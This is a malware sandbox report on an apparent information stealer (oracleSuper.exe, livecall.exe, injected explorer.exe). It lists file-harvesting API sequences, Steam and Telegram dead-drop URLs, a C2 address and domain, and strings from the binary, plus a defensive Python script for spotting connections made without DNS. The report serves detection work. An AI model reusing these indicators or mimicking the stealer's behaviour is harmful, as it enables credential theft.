Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004378FC wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_004378FC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042BC98 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 9_2_0042BC98
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004374B6 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 9_2_004374B6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004365F0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose, 9_2_004365F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042D690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 9_2_0042D690
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00436EA6 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 9_2_00436EA6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042C6B5 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 9_2_0042C6B5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00429FC0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_00429FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00436B15 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA, 9_2_00436B15

Networking

Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 149.154.167.99 443 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 65.21.246.249 443 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 104.102.49.254 443 Jump to behavior
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199735694209
Source: global traffic HTTP traffic detected: GET /profiles/76561199735694209 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /puffclou HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 65.21.246.249 65.21.246.249
Source: Joe Sandbox View IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View ASN Name: CP-ASDE CP-ASDE
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49877 -> 65.21.246.249:443
Source: unknown TCP traffic detected without corresponding DNS query: 65.21.246.249 (14 connections)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 datagrams)
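Analyst note (added example, not part of the sandbox output): the "TCP traffic detected without corresponding DNS query" finding is a simple correlation that is worth reproducing in your own telemetry, because a host reaching an address no DNS answer produced is exactly how a stealer behaves once it has read its real C2 address from a dead-drop page. The event stream below is constructed to mirror the observations above: explorer.exe connects to the two resolved hosts and then, repeatedly, to 65.21.246.249 with no answer for that address. The name-to-IP pairings are an assumption for the example, since the report lists DNS queries and TLS peers separately.

```python
from dataclasses import dataclass


@dataclass
class NetEvent:
    ts: float          # seconds, monotonic within the capture
    kind: str          # "dns" (a resolved answer) or "connect" (outbound TCP/UDP)
    process: str = ""  # initiating process for connects
    name: str = ""     # queried name for dns events
    ip: str = ""       # resolved address (dns) or destination (connect)
    port: int = 0


# Constructed event stream modelled on the observations above (assumed name->IP pairings).
SAMPLE_EVENTS = [
    NetEvent(1.0, "dns", name="steamcommunity.com", ip="104.102.49.254"),
    NetEvent(1.2, "connect", process="explorer.exe", ip="104.102.49.254", port=443),
    NetEvent(2.0, "dns", name="t.me", ip="149.154.167.99"),
    NetEvent(2.3, "connect", process="explorer.exe", ip="149.154.167.99", port=443),
] + [
    NetEvent(5.0 + i, "connect", process="explorer.exe", ip="65.21.246.249", port=443)
    for i in range(14)
]


def connects_without_dns(events, window_s: float = 600.0) -> dict:
    """Return {(process, ip, port): count} for connections whose destination was not
    produced by a DNS answer within window_s seconds beforehand.

    Repeated connections to the same tuple are aggregated so a reconnect loop yields one
    finding with a count instead of one alert per attempt.
    """
    resolved = {}   # ip -> timestamp of the most recent DNS answer carrying that address
    findings = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "dns" and ev.ip:
            resolved[ev.ip] = ev.ts
        elif ev.kind == "connect":
            answered_at = resolved.get(ev.ip)
            if answered_at is None or ev.ts - answered_at > window_s:
                key = (ev.process, ev.ip, ev.port)
                findings[key] = findings.get(key, 0) + 1
    return findings


if __name__ == "__main__":
    for (proc, ip, port), count in connects_without_dns(SAMPLE_EVENTS).items():
        print(f"{proc} -> {ip}:{port} without DNS resolution ({count} connections)")
```

Expect false positives from addresses resolved before capture started (DNS cache), hosts-file entries and software that legitimately embeds IP literals; the second signal that makes this case convincing is the initiating process, since explorer.exe has no business opening TLS sessions to an unresolved address on its own.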
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004258C4 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 9_2_004258C4
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: tea.arpdabl.org
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: livecall.exe, 00000003.00000002.2195560653.00000000026A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://c0rl.m%L
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: livecall.exe, livecall.exe, 00000003.00000002.2196853032.0000000027501000.00000020.00000001.01000000.0000000A.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr String found in binary or memory: http://clientconfig.passport.net
Source: oracleSuper.exe String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: oracleSuper.exe String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: oracleSuper.exe String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: oracleSuper.exe String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: oracleSuper.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: oracleSuper.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: livecall.exe, 00000002.00000002.2170794946.000000000079D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195560653.00000000026A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.co(m/D
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: oracleSuper.exe String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: oracleSuper.exe String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: msidcrl40.dll.2.dr String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: livecall.exe, livecall.exe, 00000003.00000002.2196853032.0000000027501000.00000020.00000001.01000000.0000000A.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe.0.dr, livecall.exe.2.dr String found in binary or memory: http://messenger.live.com
Source: oracleSuper.exe String found in binary or memory: http://ocsp.comodoca.com0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0L
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: oracleSuper.exe String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: oracleSuper.exe String found in binary or memory: http://ocsp.sectigo.com0
Source: oracleSuper.exe String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s2.symcb.com0
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: livecall.exe String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/poli
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2003/06/secext
Source: livecall.exe String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/0
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/03/addressing
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: msidcrl40.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: oracleSuper.exe String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcd.com0&
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arp
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpdabl
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org
Source: explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.0000000003585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org/
Source: explorer.exe, 00000009.00000002.2541375791.0000000003585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org/.
Source: explorer.exe, 00000009.00000002.2541375791.0000000003585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org/:
Source: explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org/Yo
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.orgxe
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.s.exe
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpdablss.exe
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.arpy
Source: explorer.exe, 00000009.00000002.2540314947.00000000005E9000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: http://tea.stry
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000448B000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.0000000002771000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.0000000002751000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004F75000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.000000000342E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.info-zip.org/
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000448B000.00000004.00000020.00020000.00000000.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr String found in binary or memory: http://www.passport.net/0
